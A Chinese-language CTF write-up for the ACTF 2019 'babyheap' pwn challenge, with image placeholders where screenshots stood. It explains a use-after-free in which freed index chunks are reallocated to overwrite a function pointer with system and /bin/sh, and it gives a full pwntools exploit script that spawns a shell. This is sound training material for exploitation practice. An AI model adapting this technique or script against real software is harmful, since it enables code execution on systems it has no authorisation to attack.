这题看名字就知道是堆题，先看保护：

---

保护除了PIE全开，黑盒测试：

---

题目提供增删查，没有改。看看IDA中代码逻辑：

---

逻辑跟我前面做的一题极为相似，就不过多分析。

这是free：

---

---

因为题目不能改写got表，但是题目给了system函数地址和bin/sh。因此我们的利用就简单了。直接利用show的调用方式去调用system函数。

我们看看申请三个堆的情况：

---

圈起来的是索引堆的内容。

漏洞利用：

想办法把索引堆释放并申请回来，在上面布局我们的system（bin/sh）

exp如下：

#!/usr/bin/env python
# -*- coding: utf-8 -*-

from pwn import *

context(arch='amd64', os='linux', log_level='debug')

io=process('./ACTF_2019_babyheap')
#io=remote('node5.buuoj.cn',29583)

def Create(Size,Content):
  io.recvuntil("choice:")
  io.sendline("1")
  io.recvuntil("size:")
  io.sendline(str(Size))
  io.recvuntil("content:")
  io.sendline(Content)

  

def Delete(idx):
  io.recvuntil("choice:")
  io.sendline("2")
  io.recvuntil("index:")
  io.send(str(idx))

def show(idx):
    io.recvuntil("choice:")
    io.sendline("3")
    io.recvuntil("index:")
    io.sendline(str(idx))
    
  
system_addr=0x4007a0
binsh_addr=0x602010
#gdb.attach(io)

Create(0x20,'aaaa')
Create(0x20,'aaaa')
Create(0x20,'aaaa')
#pause()
Delete(0)
Delete(1)

Create(0x18, p64(binsh_addr) + p64(system_addr))

show(0)


io.interactive()